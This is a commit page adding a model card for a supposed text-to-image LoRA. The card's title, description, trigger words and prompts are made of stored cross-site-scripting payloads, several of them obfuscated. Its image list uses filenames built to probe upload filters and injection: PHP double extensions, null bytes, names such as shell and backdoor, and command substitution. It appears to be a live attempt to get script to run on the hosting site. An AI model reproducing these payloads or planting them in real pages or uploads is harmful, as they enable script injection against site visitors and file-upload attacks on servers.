victim1998p
commited on
Commit
•
6315a3c
0
Parent(s):
initial commit
Browse files- .gitattributes +55 -0
- README.md +247 -0
.gitattributes
ADDED
@@ -0,0 +1,55 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
*.7z filter=lfs diff=lfs merge=lfs -text
|
2 |
+
*.arrow filter=lfs diff=lfs merge=lfs -text
|
3 |
+
*.bin filter=lfs diff=lfs merge=lfs -text
|
4 |
+
*.bz2 filter=lfs diff=lfs merge=lfs -text
|
5 |
+
*.ckpt filter=lfs diff=lfs merge=lfs -text
|
6 |
+
*.ftz filter=lfs diff=lfs merge=lfs -text
|
7 |
+
*.gz filter=lfs diff=lfs merge=lfs -text
|
8 |
+
*.h5 filter=lfs diff=lfs merge=lfs -text
|
9 |
+
*.joblib filter=lfs diff=lfs merge=lfs -text
|
10 |
+
*.lfs.* filter=lfs diff=lfs merge=lfs -text
|
11 |
+
*.lz4 filter=lfs diff=lfs merge=lfs -text
|
12 |
+
*.mlmodel filter=lfs diff=lfs merge=lfs -text
|
13 |
+
*.model filter=lfs diff=lfs merge=lfs -text
|
14 |
+
*.msgpack filter=lfs diff=lfs merge=lfs -text
|
15 |
+
*.npy filter=lfs diff=lfs merge=lfs -text
|
16 |
+
*.npz filter=lfs diff=lfs merge=lfs -text
|
17 |
+
*.onnx filter=lfs diff=lfs merge=lfs -text
|
18 |
+
*.ot filter=lfs diff=lfs merge=lfs -text
|
19 |
+
*.parquet filter=lfs diff=lfs merge=lfs -text
|
20 |
+
*.pb filter=lfs diff=lfs merge=lfs -text
|
21 |
+
*.pickle filter=lfs diff=lfs merge=lfs -text
|
22 |
+
*.pkl filter=lfs diff=lfs merge=lfs -text
|
23 |
+
*.pt filter=lfs diff=lfs merge=lfs -text
|
24 |
+
*.pth filter=lfs diff=lfs merge=lfs -text
|
25 |
+
*.rar filter=lfs diff=lfs merge=lfs -text
|
26 |
+
*.safetensors filter=lfs diff=lfs merge=lfs -text
|
27 |
+
saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
28 |
+
*.tar.* filter=lfs diff=lfs merge=lfs -text
|
29 |
+
*.tar filter=lfs diff=lfs merge=lfs -text
|
30 |
+
*.tflite filter=lfs diff=lfs merge=lfs -text
|
31 |
+
*.tgz filter=lfs diff=lfs merge=lfs -text
|
32 |
+
*.wasm filter=lfs diff=lfs merge=lfs -text
|
33 |
+
*.xz filter=lfs diff=lfs merge=lfs -text
|
34 |
+
*.zip filter=lfs diff=lfs merge=lfs -text
|
35 |
+
*.zst filter=lfs diff=lfs merge=lfs -text
|
36 |
+
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
37 |
+
# Audio files - uncompressed
|
38 |
+
*.pcm filter=lfs diff=lfs merge=lfs -text
|
39 |
+
*.sam filter=lfs diff=lfs merge=lfs -text
|
40 |
+
*.raw filter=lfs diff=lfs merge=lfs -text
|
41 |
+
# Audio files - compressed
|
42 |
+
*.aac filter=lfs diff=lfs merge=lfs -text
|
43 |
+
*.flac filter=lfs diff=lfs merge=lfs -text
|
44 |
+
*.mp3 filter=lfs diff=lfs merge=lfs -text
|
45 |
+
*.ogg filter=lfs diff=lfs merge=lfs -text
|
46 |
+
*.wav filter=lfs diff=lfs merge=lfs -text
|
47 |
+
# Image files - uncompressed
|
48 |
+
*.bmp filter=lfs diff=lfs merge=lfs -text
|
49 |
+
*.gif filter=lfs diff=lfs merge=lfs -text
|
50 |
+
*.png filter=lfs diff=lfs merge=lfs -text
|
51 |
+
*.tiff filter=lfs diff=lfs merge=lfs -text
|
52 |
+
# Image files - compressed
|
53 |
+
*.jpg filter=lfs diff=lfs merge=lfs -text
|
54 |
+
*.jpeg filter=lfs diff=lfs merge=lfs -text
|
55 |
+
*.webp filter=lfs diff=lfs merge=lfs -text
|
README.md
ADDED
@@ -0,0 +1,247 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
---
|
2 |
+
tags:
|
3 |
+
- text-to-image
|
4 |
+
- stable-diffusion
|
5 |
+
- lora
|
6 |
+
- diffusers
|
7 |
+
- template:sd-lora
|
8 |
+
widget:
|
9 |
+
- text: >-
|
10 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
11 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
12 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
13 |
+
onmouseleave=print()>
|
14 |
+
parameters:
|
15 |
+
negative_prompt: >-
|
16 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
17 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
18 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
19 |
+
onmouseleave=print()>
|
20 |
+
output:
|
21 |
+
url: images/bugzilla2.jpg
|
22 |
+
- text: >-
|
23 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
24 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
25 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
26 |
+
onmouseleave=print()>
|
27 |
+
parameters:
|
28 |
+
negative_prompt: >-
|
29 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
30 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
31 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
32 |
+
onmouseleave=print()>
|
33 |
+
output:
|
34 |
+
url: images/bugzilla.jpg
|
35 |
+
- text: >-
|
36 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
37 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
38 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
39 |
+
onmouseleave=print()>
|
40 |
+
parameters:
|
41 |
+
negative_prompt: >-
|
42 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
43 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
44 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
45 |
+
onmouseleave=print()>
|
46 |
+
output:
|
47 |
+
url: images/xss2.pdf.png
|
48 |
+
- text: >-
|
49 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
50 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
51 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
52 |
+
onmouseleave=print()>
|
53 |
+
parameters:
|
54 |
+
negative_prompt: >-
|
55 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
56 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
57 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
58 |
+
onmouseleave=print()>
|
59 |
+
output:
|
60 |
+
url: images/xss1.jpeg
|
61 |
+
- text: '-'
|
62 |
+
output:
|
63 |
+
url: images/svg-xss-xml.jpeg
|
64 |
+
- text: '-'
|
65 |
+
output:
|
66 |
+
url: images/%00';alert(1); - Copie.jpg
|
67 |
+
- text: '-'
|
68 |
+
output:
|
69 |
+
url: images/xsspng.png
|
70 |
+
- text: '-'
|
71 |
+
output:
|
72 |
+
url: images/white_hat%0a.png
|
73 |
+
- text: '-'
|
74 |
+
output:
|
75 |
+
url: images/ssrf.png
|
76 |
+
- text: '-'
|
77 |
+
output:
|
78 |
+
url: images/ssrf.jpg
|
79 |
+
- text: '-'
|
80 |
+
output:
|
81 |
+
url: images/simple-backdoor2.php.gif
|
82 |
+
- text: '-'
|
83 |
+
output:
|
84 |
+
url: images/simple-backdoor.php.gif
|
85 |
+
- text: '-'
|
86 |
+
output:
|
87 |
+
url: images/shell2.php;.jpg
|
88 |
+
- text: '-'
|
89 |
+
output:
|
90 |
+
url: images/shell.png
|
91 |
+
- text: '-'
|
92 |
+
output:
|
93 |
+
url: images/shell.php;.jpg
|
94 |
+
- text: '-'
|
95 |
+
output:
|
96 |
+
url: images/rce2.php.jpg
|
97 |
+
- text: '-'
|
98 |
+
output:
|
99 |
+
url: images/rce.php.jpg
|
100 |
+
- text: '-'
|
101 |
+
output:
|
102 |
+
url: images/pwnd.php.jpg
|
103 |
+
- text: '-'
|
104 |
+
output:
|
105 |
+
url: images/phppng.png
|
106 |
+
- text: '-'
|
107 |
+
output:
|
108 |
+
url: images/phpinfo.php.gif
|
109 |
+
- text: "ASCII\0\0\0<? phpinfo(); ?>"
|
110 |
+
output:
|
111 |
+
url: images/phpinfo.jpg
|
112 |
+
- text: '-'
|
113 |
+
output:
|
114 |
+
url: images/php-backdoor.php.jpg
|
115 |
+
- text: '-'
|
116 |
+
output:
|
117 |
+
url: images/php-backdoor.php%00.jpg
|
118 |
+
- text: '-'
|
119 |
+
output:
|
120 |
+
url: images/php-backdoor.jpg
|
121 |
+
- text: '-'
|
122 |
+
output:
|
123 |
+
url: images/onerror=alert('XSS')' a='.jpg
|
124 |
+
- text: '-'
|
125 |
+
output:
|
126 |
+
url: images/loading.gif
|
127 |
+
- text: '-'
|
128 |
+
output:
|
129 |
+
url: images/kos`uname`oss.jpg
|
130 |
+
- text: '-'
|
131 |
+
output:
|
132 |
+
url: images/jpeg.php.jpg
|
133 |
+
- text: '-'
|
134 |
+
output:
|
135 |
+
url: images/jpeg.php%00.jpg
|
136 |
+
- text: '-'
|
137 |
+
output:
|
138 |
+
url: images/jaja.php.orionn.gif
|
139 |
+
- text: '-'
|
140 |
+
output:
|
141 |
+
url: images/image.jpg
|
142 |
+
- text: '-'
|
143 |
+
output:
|
144 |
+
url: images/image%00.jpg
|
145 |
+
- text: '-'
|
146 |
+
output:
|
147 |
+
url: images/hithere.php.jpg
|
148 |
+
- text: '-'
|
149 |
+
output:
|
150 |
+
url: images/gifshell.php.gif
|
151 |
+
- text: '-'
|
152 |
+
output:
|
153 |
+
url: images/exploit.png
|
154 |
+
- text: '-'
|
155 |
+
output:
|
156 |
+
url: images/exploit.jpg
|
157 |
+
- text: '-'
|
158 |
+
output:
|
159 |
+
url: images/exifremover.jpg
|
160 |
+
- text: '-'
|
161 |
+
output:
|
162 |
+
url: images/download.gif
|
163 |
+
- text: '-'
|
164 |
+
output:
|
165 |
+
url: images/Sun'__img src=x onerror=alert(1)_set.jpg
|
166 |
+
- text: '-'
|
167 |
+
output:
|
168 |
+
url: images/404.php.jpg
|
169 |
+
- text: '-'
|
170 |
+
output:
|
171 |
+
url: images/1N3.jpg
|
172 |
+
- text: '-'
|
173 |
+
output:
|
174 |
+
url: images/';alert(1);x='.jpg
|
175 |
+
- text: '-'
|
176 |
+
output:
|
177 |
+
url: images/'+alert(1)+'.jpg
|
178 |
+
- text: '-'
|
179 |
+
output:
|
180 |
+
url: images/%22onerror=%22alert(1)%22a=%22.jpg
|
181 |
+
- text: '-'
|
182 |
+
output:
|
183 |
+
url: images/%22__img src=x onerror=prompt(1)_.jpg
|
184 |
+
- text: '-'
|
185 |
+
output:
|
186 |
+
url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E.png
|
187 |
+
- text: '-'
|
188 |
+
output:
|
189 |
+
url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a.png
|
190 |
+
- text: '-'
|
191 |
+
output:
|
192 |
+
url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a%0f.png
|
193 |
+
- text: '-'
|
194 |
+
output:
|
195 |
+
url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%00.png
|
196 |
+
- text: '-'
|
197 |
+
output:
|
198 |
+
url: images/%1.jpg
|
199 |
+
- text: '-'
|
200 |
+
output:
|
201 |
+
url: images/%0a1.jpg
|
202 |
+
- text: '-'
|
203 |
+
output:
|
204 |
+
url: images/%0a';alert(2);.jpg
|
205 |
+
- text: '-'
|
206 |
+
output:
|
207 |
+
url: images/%0a';alert(1);.jpg
|
208 |
+
- text: '-'
|
209 |
+
output:
|
210 |
+
url: images/%0011.jpg
|
211 |
+
- text: '-'
|
212 |
+
output:
|
213 |
+
url: images/%001.jpg
|
214 |
+
- text: '-'
|
215 |
+
output:
|
216 |
+
url: images/%00';alert(2);.jpg
|
217 |
+
- text: '-'
|
218 |
+
output:
|
219 |
+
url: images/%00';alert(1);.jpg
|
220 |
+
base_model: stabilityai/stable-cascade
|
221 |
+
instance_prompt: >-
|
222 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
|
223 |
+
OnError=confirm(1)> <fieldset//%00//onsite
|
224 |
+
OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
|
225 |
+
onmouseleave=print()>
|
226 |
+
license: bigscience-bloom-rail-1.0
|
227 |
+
---
|
228 |
+
# <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
|
229 |
+
|
230 |
+
<Gallery />
|
231 |
+
|
232 |
+
## Model description
|
233 |
+
|
234 |
+
<img/src=x onError="`${x}`;alert(`xss stored`);">
|
235 |
+
<Img Src=OnXSS OnError=confirm(1)>
|
236 |
+
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`>
|
237 |
+
?><img src=x onmouseleave=print()>
|
238 |
+
|
239 |
+
## Trigger words
|
240 |
+
|
241 |
+
You should use `<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>` to trigger the image generation.
|
242 |
+
|
243 |
+
|
244 |
+
## Download model
|
245 |
+
|
246 |
+
|
247 |
+
[Download](/victim1998p/victimdz/tree/main) them in the Files & versions tab.
|